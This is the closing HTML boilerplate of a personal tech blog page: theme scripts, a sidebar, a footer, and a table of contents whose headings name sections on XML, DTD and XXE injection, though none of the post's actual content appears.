    <a href="/rustymoon/2023/11/26/daily/" rel="prev" title="daily">
      <i class="fa fa-chevron-left"></i> daily
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#XML"><span class="nav-number">1.</span> <span class="nav-text">XML</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%89%B9%E7%82%B9"><span class="nav-number">1.1.</span> <span class="nav-text">特点</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%8EHTML%E6%9C%89%E5%8C%BA%E5%88%AB"><span class="nav-number">1.2.</span> <span class="nav-text">与HTML有区别</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DTD"><span class="nav-number">1.3.</span> <span class="nav-text">DTD</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#DTD%E5%BC%95%E7%94%A8"><span class="nav-number">1.3.1.</span> <span class="nav-text">DTD引用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#DTD%E5%AE%9E%E4%BD%93%E5%A3%B0%E6%98%8E"><span class="nav-number">1.3.2.</span> <span class="nav-text">DTD实体声明</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#XML%E6%B3%A8%E5%85%A5"><span class="nav-number">2.</span> <span class="nav-text">XML注入</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#XXE-XML-External-Entity-Injection"><span class="nav-number">3.</span> <span class="nav-text">XXE(XML External Entity Injection)</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#demo-test"><span class="nav-number">3.1.</span> <span class="nav-text">demo test</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%9B%B4%E6%8E%A5%E5%88%A9%E7%94%A8"><span class="nav-number">3.2.</span> <span class="nav-text">直接利用</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%BF%9C%E7%A8%8B%E8%B0%83%E7%94%A8DTD"><span class="nav-number">3.3.</span> <span class="nav-text">远程调用DTD</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#xxe-lab-test"><span class="nav-number">3.4.</span> <span class="nav-text">xxe-lab test</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Next-Level"><span class="nav-number">4.</span> <span class="nav-text">Next Level</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="lueflam"
      src="/rustymoon/images/fa.jpg">
  <p class="site-author-name" itemprop="name">lueflam</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/rustymoon/archives/">
        
          <span class="site-state-item-count">8</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/rustymoon/tags/">
          
        <span class="site-state-item-count">9</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">lueflam</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="Symbols count total">21k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="Reading time total">19 mins.</span>
</div>

        








      </div>
    </footer>
  </div>

  
  <script src="/rustymoon/lib/anime.min.js"></script>
  <script src="/rustymoon/lib/velocity/velocity.min.js"></script>
  <script src="/rustymoon/lib/velocity/velocity.ui.min.js"></script>

<script src="/rustymoon/js/utils.js"></script>

<script src="/rustymoon/js/motion.js"></script>


<script src="/rustymoon/js/schemes/pisces.js"></script>


<script src="/rustymoon/js/next-boot.js"></script>




  




  
<script src="/rustymoon/js/local-search.js"></script>













  

  

</body>
</html>
